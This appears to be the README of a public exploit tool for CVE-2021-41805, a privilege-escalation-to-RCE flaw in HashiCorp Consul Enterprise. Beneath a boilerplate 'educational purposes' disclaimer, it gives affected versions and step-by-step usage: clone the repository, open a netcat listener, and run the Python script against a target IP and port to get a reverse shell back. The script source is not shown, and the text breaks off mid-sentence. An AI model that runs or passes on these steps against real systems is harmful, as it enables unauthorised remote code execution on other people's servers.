## https://sploitus.com/exploit?id=011874D1-F225-538F-8A91-1655D62CE38F
# CVE-2021-41805 - HashiCorp Consul Enterprise RCE
> [!WARNING]
> LEGAL DISCLAIMER:
> This tool is STRICTLY for EDUCATIONAL PURPOSES ONLY!
> Usage of this tool for attacking targets without prior mutual consent is ILLEGAL.
> It is the user's responsibility to obey all laws that apply whilst using this tool.
> The developer of this tool assumes no liability and is not responsible for any misuse
> or damage caused by this program.
## About the CVE
An **ACL token** (with the default **operator:write** permissions) in one namespace can be used for unintended privilege escalation in a different namespace. This can be abused to gain **Remote Code Execution (RCE)** with escalated privileges.
## Affected Versions
- < 1.8.17
- 1.9.x < 1.9.11
- 1.10.x < 1.10.4
## Installing and Running the Script
- First, clone the repository:\
`git clone https://github.com/acfirthh/CVE-2021-41805.git`
- Change directory into the cloned repository:\
`cd CVE-2021-41805`
- Start a simple listener:\
`nc -nvlp <LISTENER_PORT>`
- Run the script:\
`python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [OPTIONAL: -t <ACL token> -v (verbose) -s (use SSL)]`
## Expected Output
Running the exploit with the basic arguments: **-r [TARGET_IP]**, **-rp [TARGET_PORT]**, **-l [LISTENER_IP]**, **-lp [LISTENER_PORT]** (**-t [ACL_TOKEN]**, **-s [Use SSL]**) will give basic output like:
```
[*] The PUT request was made successfully. Check your listener...
```
Running the exploit with the basic arguments plus **-v [VERBOSE]** will give verbose output:\
If an error occurs when the exploit is run and the **-v** argument is specified, the output will be something like:\
